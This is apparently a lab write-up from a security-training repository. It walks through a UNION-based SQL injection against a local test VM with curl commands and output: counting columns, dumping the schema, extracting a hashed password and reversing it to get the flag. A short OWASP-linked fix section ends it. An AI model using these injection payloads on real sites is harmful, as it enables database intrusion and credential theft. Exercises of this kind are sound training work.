aboutsummaryrefslogtreecommitdiffstats
path: root/SQL injection 1/Resources/notes.md
blob: 3292f8601a4cd2c4b82b6afc3a3996a071d34175 (plain) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

## Exploit

1. At `http://10.0.2.15/?page=member` we can inject SQL. Using an empty input and we see the error `You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1` so we can assume the SQL query is shaped like `… WHERE id=<our input>`
1. Try to `SELECT` everything with a `UNION`:
    ```bash
     curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode 'id=5 UNION SELECT * FROM users'
        <pre>The used SELECT statements have a different number of columns</pre>
    ```
1. From the previous output we try an increasing number of placeholders to deduce that the original query uses two columns:
    ```bash
     curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode 'id=5 UNION SELECT 1,2 FROM users'
    ```
1. We get a list of all columns of all tables in the database:
    ```bash
     curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT column_name, table_name FROM information_schema.columns" | sed 's/<pre>/\
    /g' | grep --only-matching "First name:.*"
    ```
1. After trying a bunch of them we see that `Commentaire` and `countersign` hold a clue and a hashed password:
    ```bash
    curl --silent --get 'http://10.0.2.15/index.php?page=member&Submit=Submit' --data-urlencode "id=5 UNION SELECT Commentaire, countersign FROM users" | sed 's/<pre>/\
    /g | grep --only-matching "First name:.*"

    First name: Decrypt this password -> then lower all the char. Sh256 on it and it's good !<br>Surname : 5ff9d0165b4f92b14994e5c685cdce28</pre><table width=50%>
    ```
1. `5ff9d0165b4f92b14994e5c685cdce28` reverse md5 lookup → "FortyTwo" → lowercase → "fortytwo" → `echo -n fortytwo | sha256sum`

## Fix

[https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection]()

- Don't show SQL errors on the front-end because it gives attackers clues about the database and the queries that can be used to exploit them
- Don't include untrusted, unfiltered and/or unsanitized input into a SQL query
generated by cgit v1.2.3 (git 2.46.0) at 2026-04-16 14:32:05 +0000